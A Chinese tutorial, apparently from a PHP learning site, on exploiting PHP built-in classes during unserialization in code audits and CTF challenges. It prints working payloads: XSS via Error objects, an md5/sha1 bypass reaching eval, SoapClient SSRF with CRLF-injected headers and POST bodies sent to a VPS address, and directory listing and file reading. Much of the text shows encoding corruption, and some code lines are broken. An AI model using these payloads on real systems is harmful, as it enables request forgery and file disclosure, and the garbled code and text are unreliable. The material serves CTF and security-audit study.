本篇文章為大家?guī)?lái)了關(guān)於PHP的相關(guān)知識(shí)，其中主要介紹了關(guān)於反序列化原生類別的利用，如果在程式碼審計(jì)或ctf中，有反序列化的功能點(diǎn)，但是卻不能構(gòu)造出完整的pop鏈，那這時(shí)我們?cè)撊绾纹凭帜兀旅嬉黄饋?lái)看一下，希望對(duì)大家有幫助。

推薦學(xué)習(xí)：《PHP影片教學(xué)》

淺析php反序列化原生類別的利用

如果在程式碼審計(jì)或ctf中，有反序列化的功能點(diǎn)，但是卻不能構(gòu)造出完整的pop鏈，那這時(shí)我們?cè)撊绾纹凭帜?？我們可以嘗試從php原生類別下手，php有些原生類別中內(nèi)建一些魔術(shù)方法，如果我們巧妙建構(gòu)可控參數(shù)，觸發(fā)並利用其內(nèi)建魔術(shù)方法，就有可能達(dá)到一些我們想要的目的。

一、常見(jiàn)魔術(shù)方法

__wakeup()?//執(zhí)行unserialize()時(shí)，先會(huì)調(diào)用這個(gè)函數(shù)
__sleep()?//執(zhí)行serialize()時(shí)，先會(huì)調(diào)用這個(gè)函數(shù)
__destruct()?//對(duì)象被銷毀時(shí)觸發(fā)
__call()?//在對(duì)象上下文中調(diào)用不可訪問(wèn)的方法時(shí)觸發(fā)
__callStatic()?//在靜態(tài)上下文中調(diào)用不可訪問(wèn)的方法時(shí)觸發(fā)
__get()?//用于從不可訪問(wèn)的屬性讀取數(shù)據(jù)或者不存在這個(gè)鍵都會(huì)調(diào)用此方法
__set()?//用于將數(shù)據(jù)寫入不可訪問(wèn)的屬性
__isset()?//在不可訪問(wèn)的屬性上調(diào)用isset()或empty()觸發(fā)
__unset()?//在不可訪問(wèn)的屬性上使用unset()時(shí)觸發(fā)
__toString()?//把對(duì)象當(dāng)作字符串使用時(shí)觸發(fā)
__invoke()?//當(dāng)嘗試將對(duì)象調(diào)用為函數(shù)時(shí)觸發(fā)

二、原生類別中的魔術(shù)方法

我們採(cǎi)用下面腳本遍歷一下所有原生類別中的魔術(shù)方法

<?php $classes = get_declared_classes();foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            &#39;__destruct&#39;,
            &#39;__toString&#39;,
            &#39;__wakeup&#39;,
            &#39;__call&#39;,
            &#39;__callStatic&#39;,
            &#39;__get&#39;,
            &#39;__set&#39;,
            &#39;__isset&#39;,
            &#39;__unset&#39;,
            &#39;__invoke&#39;,
            &#39;__set_state&#39;
        ))) {
            print $class . &#39;::&#39; . $method . "\n";
        }
    }}

三、一些常見(jiàn)原生類別的利用

Error/Exception

Error是所有PHP內(nèi)部錯(cuò)誤類別的基底類別。 (PHP 7, 8)

**Error::__toString ** error 的字串表達(dá)

傳回 Error 的 string表達(dá)形式。

Exception是所有使用者層級(jí)例外的基底類別。 (PHP 5, 7, 8)

**Exception::__toString ** 將例外物件轉(zhuǎn)換為字串

回傳轉(zhuǎn)換為字串（string）類型的例外。

類別屬性

• message 錯(cuò)誤訊息內(nèi)容

• code 錯(cuò)誤代碼

• file 拋出錯(cuò)誤的檔名

• line 拋出錯(cuò)誤的行數(shù)

XSS

__toString方法會(huì)傳回錯(cuò)誤或例外的字串形式，其中包含我們輸入的參數(shù)，如果我們建構(gòu)一串xss程式碼，結(jié)合echo渲染，將觸發(fā)反射形xss漏洞

範(fàn)例：

<?php $a = unserialize($_GET[&#39;a&#39;]);echo $a;

POC：

<?php $a = new Error("<script>alert('xss')");$b?=?serialize($a);echo?urlencode($b);

#hash繞過(guò)

[2020 極客大挑戰(zhàn)]Greatphp

<?phperror_reporting (0);class SYCLOVER {
    public $syc;
    public $lover;
    public function __wakeup(){
        if( ($this->syc?!=?$this->lover)?&&?(md5($this->syc)?===?md5($this->lover))?&&?(sha1($this->syc)===?sha1($this->lover))?){
???????????if(!preg_match("/\syc,?$match)){
???????????????eval($this->syc);
???????????}?else?{
???????????????die("Try?Hard?!!");
???????????}

????????}
????}}if?(isset($_GET['great'])){
????unserialize($_GET['great']);}?else?{
????highlight_file(__FILE__);}

##顯然正常方法是行不通的，而透過(guò)原生類別可進(jìn)行繞過(guò)

同樣，當(dāng)md5()和sha1()函數(shù)處理物件時(shí)，會(huì)自動(dòng)呼叫__tostring方法

先簡(jiǎn)單看一下其輸出

<?php $a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);
$d=new Exception("payload",4);
echo $a."<br>";
echo?$b."<br>";
echo?$c."<br>";
echo?$d;

可以發(fā)現(xiàn)，這兩個(gè)原生類別回傳的資訊除了行號(hào)一模一樣，利用這點(diǎn)，我們可以嘗試進(jìn)行hash函數(shù)的繞過(guò)，需要注意的是，必須將兩個(gè)傳入的物件放到同一行

因此我們可以進(jìn)行簡(jiǎn)單的測(cè)試,發(fā)現(xiàn)使用此方法可以繞過(guò)hash強(qiáng)(弱)函數(shù)比較

<?php $a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){
    echo &#39;$a不等于$b&#39;."\n";}if (md5($a)===md5($b)){
    echo "md5值相等\n";}if (sha1($a)===sha1($b)){
    echo "sha1值相等";}

根據(jù)這些知識(shí)點(diǎn)，我們可以輕鬆建構(gòu)payload

??<?phpclass  SYCLOVER {
	public $syc;
	public $lover;
	public function __wakeup(){
		if( ($this->syc?!=?$this->lover)?&&?(md5($this->syc)?===?md5($this->lover))?&&?(sha1($this->syc)===?sha1($this->lover))?){
		???if(!preg_match("/\syc,?$match)){
			???eval($this->syc);
		???}?else?{
			???die("Try?Hard?!!");
		???}
		???
		}
	}}$str?=?"?>=include~".urldecode("%D0%99%93%9E%98")."?>";//兩次取反繞過(guò)正則$a=new?Error($str,1);
	$b=new?Error($str,2);
	$c?=?new?SYCLOVER();$c->syc?=?$a;$c->lover?=?$b;
	echo(urlencode(serialize($c)));?>

SoapClient

是一個(gè)專門用來(lái)存取web服務(wù)的類，可以提供一個(gè)基於SOAP協(xié)定存取Web服務(wù)的PHP 用戶端，可以建立soap資料封包，與wsdl介面進(jìn)行互動(dòng)soap擴(kuò)充模組預(yù)設(shè)關(guān)閉，使用時(shí)需手動(dòng)開(kāi)啟

—呼叫SOAP 函數(shù)(PHP 5, 7, 8)通常，SOAP 函數(shù)可以作為SoapClient物件的方法呼叫

建構(gòu)子：

public?SoapClient?::?SoapClient(mixed?$wsdl?[，array?$options?])
第一個(gè)參數(shù)是用來(lái)指明是否是wsdl模式，如果為`null`，那就是非wsdl模式。
第二個(gè)參數(shù)為一個(gè)數(shù)組，如果在wsdl模式下，此參數(shù)可選；如果在非wsdl模式下，則必須設(shè)置location和uri選項(xiàng)，其中l(wèi)ocation是要將請(qǐng)求發(fā)送到的SOAP服務(wù)器的URL，而uri?是SOAP服務(wù)的目標(biāo)命名空間。

什麼是soap

SOAP?是基于?XML?的簡(jiǎn)易協(xié)議，是用在分散或分布的環(huán)境中交換信息的簡(jiǎn)單的協(xié)議，可使應(yīng)用程序在?HTTP?之上進(jìn)行信息交換
SOAP是webService三要素（SOAP、WSDL、UDDI）之一：WSDL?用來(lái)描述如何訪問(wèn)具體的接口，?UDDI用來(lái)管理，分發(fā)，查詢webService?，SOAP（簡(jiǎn)單對(duì)象訪問(wèn)協(xié)議）是連接或Web服務(wù)或客戶端和Web服務(wù)之間的接口。
其采用HTTP作為底層通訊協(xié)議，XML作為數(shù)據(jù)傳送的格式。

我們建構(gòu)一個(gè)利用payload，第一個(gè)參數(shù)為NULL，第二個(gè)參數(shù)的location設(shè)定為vps位址

<?php $a = new SoapClient(null, array(
&#39;location&#39; =>?'http://47.102.146.95:2333',?
'uri'?=>'uri',
'user_agent'=>'111111'));
$b?=?serialize($a);
echo?$b;
$c?=?unserialize($b);
$c->a();

監(jiān)聽(tīng)vps的2333端口，如下圖所示成功觸發(fā)SSRF，vps收到了請(qǐng)求訊息

且可以看到SOAPAction和user_agent都可控

#本地測(cè)試時(shí)發(fā)現(xiàn)，當(dāng)使用此內(nèi)建類別(即soap協(xié)定)請(qǐng)求存在服務(wù)的連接埠時(shí)，會(huì)立即報(bào)錯(cuò)，而去存取不存在服務(wù)(未佔(zhàn)用)的連接埠時(shí)，會(huì)等待一段時(shí)間報(bào)錯(cuò)，可以以此進(jìn)行內(nèi)網(wǎng)資產(chǎn)的偵測(cè)。

如果配合CRLF漏洞，還可以透過(guò) SoapClient 來(lái)控制其他參數(shù)或post傳送資料。例如:HTTP協(xié)定去攻擊Redis

CRLF知識(shí)擴(kuò)充

HTTP報(bào)文的結(jié)構(gòu)：狀態(tài)行和首部中的每行以CRLF結(jié)束，首部與主體之間由一空行分隔。
CRLF注入漏洞，是因?yàn)閃eb應(yīng)用沒(méi)有對(duì)用戶輸入做嚴(yán)格驗(yàn)證，導(dǎo)致攻擊者可以輸入一些惡意字符。
攻擊者一旦向請(qǐng)求行或首部中的字段注入惡意的CRLF(\r\n)，就能注入一些首部字段或報(bào)文主體，并在響應(yīng)中輸出。

透過(guò)結(jié)合CRLF，我們利用SoapClient CRLF便可以乾更多的事情，例如插入自訂Cookie，

<?php $a = new SoapClient(null, array(
    &#39;location&#39; =>?'http://47.102.146.95:2333',
????'uri'?=>'uri',
????'user_agent'=>"111111\r\nCookie:?PHPSESSION=dasdasd564d6as4d6a"));
????$b?=?serialize($a);echo?$b;$c?=?unserialize($b);$c->a();

發(fā)送POST的數(shù)據(jù)包，這里需要將Content-Type設(shè)置為application/x-www-form-urlencoded，我們可以通過(guò)添加兩個(gè)\r\n來(lái)將原來(lái)的Content-Type擠下去，自定義一個(gè)新的Content-Type

<?php $a = new SoapClient(null, array(
    &#39;location&#39; =>?'http://47.102.146.95:2333',
????'uri'?=>'uri',
????'user_agent'=>"111111\r\nContent-Type:?application/x-www-form-urlencoded\r\nX-Forwarded-For:?127.0.0.1\r\nCookie:?PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length:?10\r\n\r\npostdata"));
????$b?=?serialize($a);echo?$b;$c?=?unserialize($b);$c->a();

看一道ctfshow上的題，完美利用上述知識(shí)點(diǎn)

$xff?=?explode(',',?$_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip?=?array_pop($xff);?//獲取xff頭


if($ip!=='127.0.0.1'){
????die('error');
}else{
????$token?=?$_POST['token'];
????if($token=='ctfshow'){
????????file_put_contents('flag.txt',$flag);
????}
}

poc：

<?php $target = &#39;http://127.0.0.1/flag.php&#39;;
$post_string = &#39;token=ctfshow&#39;;
$b = new SoapClient(null,array(&#39;location&#39; =>?$target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type:?application/x-www-form-urlencoded'.'^^Content-Length:?'.(string)strlen($post_string).'^^^^'.$post_string,'uri'=>?"ssrf"));
$a?=?serialize($b);
$a?=?str_replace('^^',"\r\n",$a);
echo?urlencode($a);
?>

DirectoryIterator/FilesystemIterator

DirectoryIterator類提供了一個(gè)簡(jiǎn)單的接口來(lái)查看文件系統(tǒng)目錄的內(nèi)容。

DirectoryIterator::__toString 獲取字符串形式的文件名 （PHP 5,7,8）

目錄遍歷

使用此內(nèi)置類的__toString方法結(jié)合glob或file協(xié)議，即可實(shí)現(xiàn)目錄遍歷

例如:

<?php $a = new DirectoryIterator("glob:///*");
foreach ($a as $b){
    echo $b.&#39;<br>';
}

FilesystemIterator繼承于DirectoryIterator，兩者作用和用法基本相同，區(qū)別為FilesystemIterator會(huì)顯示文件的完整路徑，而DirectoryIterator只顯示文件名

因?yàn)榭梢耘浜鲜褂胓lob偽協(xié)議(查找匹配的文件路徑模式)，所以可以繞過(guò)open_basedir的限制

在php4.3以后使用了zend_class_unserialize_deny來(lái)禁止一些類的反序列化，很不幸的是這兩個(gè)原生類都在禁止名單當(dāng)中

SplFileObject

SplFileObject 類為單個(gè)文件的信息提供了一個(gè)面向?qū)ο蟮母呒?jí)接口

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

文件讀取

SplFileObject::__toString — 以字符串形式返回文件的路徑

<?phphighlight_file (__file__);$a = new SplFileObject("./flag.txt");echo $a;/*foreach($context as $f){
    echo($a);
}*/

如果沒(méi)有遍歷的話只能讀取第一行，且受到open_basedir影響

SimpleXMLElement

解析XML 文檔中的元素。 （PHP 5、PHP 7、PHP 8）

SimpleXMLElement::__construct — 創(chuàng)建一個(gè)新的 SimpleXMLElement 對(duì)象

XXE

我們查看一下其參數(shù)：

根據(jù)官方文檔，發(fā)現(xiàn)當(dāng)?shù)谌齻€(gè)參數(shù)為True時(shí)，即可實(shí)現(xiàn)遠(yuǎn)程xml文件載入，第二個(gè)參數(shù)的常量值設(shè)置為2即可。

利用可參考賽題：[SUCTF 2018]Homework

ReflectionMethod

獲取注釋內(nèi)容

(PHP 5 >= 5.1.0, PHP 7, PHP 8)

ReflectionFunctionAbstract::getDocComment — 獲取注釋內(nèi)容
由該原生類中的getDocComment方法可以訪問(wèn)到注釋的內(nèi)容

同時(shí)可利用的原生類還有ZipArchive– 刪除文件等等，不在敘述

推薦學(xué)習(xí)：《PHP視頻教程》

以上是深入了解PHP反序列化原生類的詳細(xì)內(nèi)容。更多資訊請(qǐng)關(guān)注PHP中文網(wǎng)其他相關(guān)文章！